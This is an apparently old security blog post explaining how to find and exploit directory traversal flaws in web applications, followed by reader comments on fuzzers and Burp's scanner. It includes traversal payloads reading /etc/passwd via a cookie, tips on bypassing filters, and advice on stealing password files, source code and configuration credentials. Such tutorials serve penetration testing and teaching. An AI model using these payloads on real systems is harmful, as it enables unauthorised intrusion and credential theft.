Friday, February 17, 2012

Hunting & Exploiting Directory Traversal

In cktricky's last post he provided a great outline on the ins and outs of leveraging burp's built in support for directory traversal testing.  There are two questions, however, that should immediately come to mind once you are familiar with this tool:  How do I find directory traversal & what should I look for if I do?

Finding directory traversal is the hunt for dynamic file retrieval or modification.  The antonym, static file retrieval, is when the browser is delegated the request for a file on the server.  In other words, every <a href>, css call for a file/location, and even most JavaScript calls can be considered static.  You could copy the path of those requests into the browser address bar and grab the file yourself-- because that is pretty much what the browser is doing for you.  Dynamic file retrieval, however, is when you request a server based page/function which serves you a file.  Think of it as the difference between calling someone directly on the phone vs. calling an operator who calls that person and patches you in.

Dynamic file serving takes place for a variety of reasons, such as: user content download locations, dynamic image rendering/resizing features, template engines, language parameters*, AJAX to services type calls, sometimes in cookies, and occasionally are how pages themselves get served.  These all basically look something like:




The path to the file can either be relative (../../../etc) or in some more rare cases absolute (c:/windows/boot.ini).  Additionally, these requests might be base64 or ROT13 encoded or sometimes encrypted.  Neither is a stop get.

You might think language parameters are an odd location for directory traversal, but after talking with my co-workers*, they reminded be about dynamic file modification.  Some frameworks use parameters (such as language) to prefix a directory to the request or alter the file name for the appropriate language.  Ergo:

    cookie: language=en-us;

    could turn into:

    File.Open('/' + language '/' + some-file);
  File.Open('/' + language + '.' + some-file);

If that is true, you can alter the root of a request, then use terminators to kill off the rest of what gets appended (null chars ftw) such as:

    cookie: language=../../../../../etc/passwd
  cookie: language=../../../../../etc/passwd;

Language, template/skin name, or occasionally environment type variables (such as location=PROD, DEBUG, etc...).  Anything that might be prefixed to a file name or directory to search is fair-game for that.

Now what?

Once you've identified a location which appears to be ripe for the testing-- how do you verify and what would you do?  To verify, I have found two approaches that work well: default files & known files.

The first approach is based on looking for default files on the file system.  Since you are mostly blind to what exists on a server, you look for the existence of these defaults to see if they can be retrieved.  There are two resources which I've found helpful.  The first is Mubix's list of post-exploitation commands.  In addition to a helpful list of commands for post exploit, the list includes very common files you might want to look for and steal (by operating system).  The second resource is the Apache Default layout per OS.  This can be really useful if you are attacking a system using Apache, to grab known configurations.  For non-Apache web servers, I usually install them locally and see what the default layout looks like manually.

The second approach comes into play if the first fails (and it might) because the user-context of the site doesn't have the authority to access those files.  So you have to request files you can be reasonably sure it has access to-- the webpages it already serves.  In this approach you attempt to serve other parts of the webpage, relative to the location you are currently looking at.  As a contrived example, say you see a layout something like:


you'd test for:


Since you know that the user-context of the site has the authority to serve those pages, it -should- be a fairly practical way to verify if your directory traversal is working.  You may even get back source code this way. :-)

If you are attempting to take over the server, you should be looking to steal resources which would help you with that (such as the passwd & sam files).  If you are attempting to do an involuntary code review, you should steal the source code from the pages you are looking at.  There are occasionally hard coded credentials source, but application configuration files are often gold for credentials.  I've found database, admin users, SMTP credentials and FTP users this way.

Some final things to consider:
  • Most operating systems support the use of environment variables/shortcuts for locations such as %home% or ~.  This is useful to remember if there are protections against using a period or two successive periods.
  • When dynamic features serve files, they often violate other protections.  In IIS for instance various extensions cannot be served by the server (.config files for instance).  However in most directory traversals you can pull the web.config file out w/o many problems.
  • User controlled uploads often get served dynamically because there isn't a way for the server to know before-hand what the files are.  You can sometimes find directory traversal here by uploading files with weird path's in their names (or renaming them after upload). 
  • Developers sometimes leave clues to file's physical locations in comments.  I once downloaded a source for an entire site because of this. 
  • Image / gallery plugins for CMS's are notorious for directory traversal.
  • Error messages are your friend here.  If you get a system/application error instead of a file not found type error, you can at least use the mechanism to check for existence of files.
Happy Hunting.


* Thanks DC & AJ



nitr0us said...

You could use our fuzzer to discover Directory Traversal vulnerabilities ;-)

Cheers !

CG said...

ewww perl... :-)

Anonymous said...

nitrĂ˜us: Personally, I don't like showing people tools until they can prove they can do something manually.

That said, I haven't really used your tool much before. I did a quick review of some source, and didn't see anything related to null/termination at end of strings. If I didn't see it, I'd love to know where it is. With out that you might miss a whole set of directory traversal vulns where the parameter is prefixed to a file name.

nitr0us said...

kizushi, thanks for your comments !

Well, the null termination is located in
my @Special_Sufixes = ("", "index.html", "index.htm", ";index.html", ";index.htm");

Also, you can specify it through the -e parameter (file extension, e.g. .jpg)

I hope it helps and again, thanks for your feedback !


Rezorcinol said...

When I start Burp active scanner, it will automatically try to find file traversal vulnerabilities. Is it needed to perform the search manually even if you already launched active scanner? In another words - Can I rely on Burp active scanner it will find file traversal vulnerabilities?